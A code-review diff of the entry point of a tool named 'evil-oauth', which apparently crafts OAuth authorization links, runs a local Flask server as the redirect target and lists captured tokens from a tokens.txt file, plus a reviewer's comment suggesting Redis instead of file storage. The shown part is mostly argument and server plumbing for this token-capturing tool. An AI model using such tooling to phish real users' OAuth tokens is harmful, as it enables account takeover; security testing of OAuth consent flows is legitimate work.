src/app.py

```diff
@@ -13,39 +29,114 @@ def set_log_level(verbose):
+parser.add_argument('-c', '--client-id', required=True, help='OAuth2.0 Client ID')
+parser.add_argument('-r', '--response-type', default='token', 
 		help='OAuth 2.0 Response Type [code (AuthZ "Code" Flow) | token (Implicit "Token" Flow)]')
-	parser.add_argument('-s', '--scope', required=True, help='OAuth2.0 Scopes')
-	parser.add_argument('-e', '--endpoint', required=True, help='OAuth2.0 Target URI Endpoint')
-	parser.add_argument('--redirect_server', default='127.0.0.1:5000', help='OAuth2.0 Target URI Endpoint')
-	parser.add_argument('-v', '--verbose', action='count', default=0, help='Increase verbosity level')
-	args = parser.parse_args()
-
-	set_log_level(args.verbose)
-	logging.info(f'evil-oauth {__version__}')
-
-	redirect_uri = f'https://{args.redirect_server}/{redirect_uri_endpoint}'
-
-	logging.info(f'Endpoint: {args.endpoint}')
-	logging.info(f'Client ID: {args.client_id}')
-	logging.info(f'Scope: {args.scope}')
-	logging.info(f'Response Type: {args.response_type}')
-	logging.info(f'Redirect URI: {redirect_uri}')
-	logging.info(f'{args.endpoint}?client_id={args.client_id}&scope={args.scope}&'
-		     f'response_type={args.response_type}&redirect_uri={redirect_uri}')
-	
+parser.add_argument('-s', '--scope', required=True, help='OAuth2.0 Scopes')
+parser.add_argument('-e', '--endpoint', required=True, help='OAuth2.0 Target URI Endpoint')
+parser.add_argument('--redirect_server', default='127.0.0.1:5000', help='OAuth2.0 Target URI Endpoint')
+parser.add_argument('-v', '--verbose', action='count', default=0, help='Increase verbosity level')
+args = parser.parse_args()
+
+set_log_level(args.verbose)
+logging.info(f'evil-oauth {__version__}')
+
+global_endpoint = args.endpoint
+global_client_id = args.client_id
+global_scope = args.scope
+global_response_type = args.response_type
+global_redirect_uri = f'https://{args.redirect_server}/{redirect_uri_endpoint}'
+
 	# Storare Arguments for routes.py
-	flask_app.config['ENDPOINT'] = args.endpoint
-	flask_app.config['CLIENT_ID'] = args.client_id
-	flask_app.config['SCOPE'] = args.scope
-	flask_app.config['RESPONSE_TYPE'] = args.response_type
-	flask_app.config['REDIRECT_URI'] = redirect_uri
-	
-	# Import Routes
-	from . import routes
-	flask_app.run(ssl_context=('adhoc'), debug=True)
+flask_app.config['ENDPOINT'] = args.endpoint
+flask_app.config['CLIENT_ID'] = args.client_id
+flask_app.config['SCOPE'] = args.scope
+flask_app.config['RESPONSE_TYPE'] = args.response_type
+flask_app.config['REDIRECT_URI'] = global_redirect_uri
+     
+# Import Routes
+from . import routes
+
+def run_flask_app():
+	flask_app.run(ssl_context='adhoc', debug=True, use_reloader=False)
+
+@click.group()
+def cli():
+    pass
+
+@cli.command()
+@click.argument('token_id', required=False)
+def tokens(token_id):
+    """Show tokens. If TOKEN_ID is provided, show the full token for that ID."""
+    show_tokens(token_id)
+
+def show_tokens(token_id=None):
+    try:
+        with open('tokens.txt', 'r') as file:
```

Comment:
Do not use files on disk for temporary storage. Convert this to a light weight database, e.g. Redis.